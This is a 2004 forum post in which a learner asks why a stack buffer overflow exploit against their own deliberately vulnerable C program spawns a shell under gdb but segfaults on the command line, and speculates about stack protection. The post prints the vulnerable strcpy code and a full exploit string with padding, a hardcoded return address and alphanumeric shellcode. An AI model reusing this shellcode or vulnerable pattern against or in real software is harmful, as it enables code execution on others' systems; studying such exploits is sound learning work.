cgibreak
n00b
Joined: 12 Oct 2003
Posts: 20
|
 Posted: Sat Apr 03, 2004 1:57 am Post subject: my exploit only works in a gdb environment |
 |
|
I made a simple little program to see if i could exploit it with a buffer overflow:
| Code: |
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[16];
strcpy(buf, argv[1]); // kinda obvious :D
printf("%s\n", buf);
}
|
I eventually got a working exploit string for this:
| Code: |
// padding to get up to the return address
"hhhhhhhhhhhhhhhhhhhhhhhhhhhh"
// changed return addr
"\xf0\xf4\xff\xbf"
// sexy looking shellcode i found on the net
// (object of return address)
"LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5E"
"CfPDVUajcX0Dob0TodjdY0LohfhmNfXf1Dol0topjYY0Loq0"
"toq0totjJX0Dou0tou0TovjFX0Dow0towjhXfRhnKshhBabi"
"vERSvT29"
|
i can get this to work in gdb:
| Code: |
(gdb) run $'<snip>'
Starting program: /home/cgibreak/programming/hackme/hackme $'<snip>'
<snip>
sh-2.05b$
|
Anyways, my problem is when i run it on the commandline. It
just segfaults. Is this a stack-randomization thing that is
disabled in gdb? What could be causing this?
thanks
EDIT:
Looked at propolice, even more confused.
[url]http://www.usenix.org/events/sec01/full_papers/frantzen/frantzen_html/node30.html[\url]
It says that it places a random "canary" in between the buffer
and the return address. That would explain why i had to go
through extra bytes to get to the return address, but what
really freaks me out is that even when i use -fno-stack-protector
the same string still works in gdb! |
|
Networking & Security
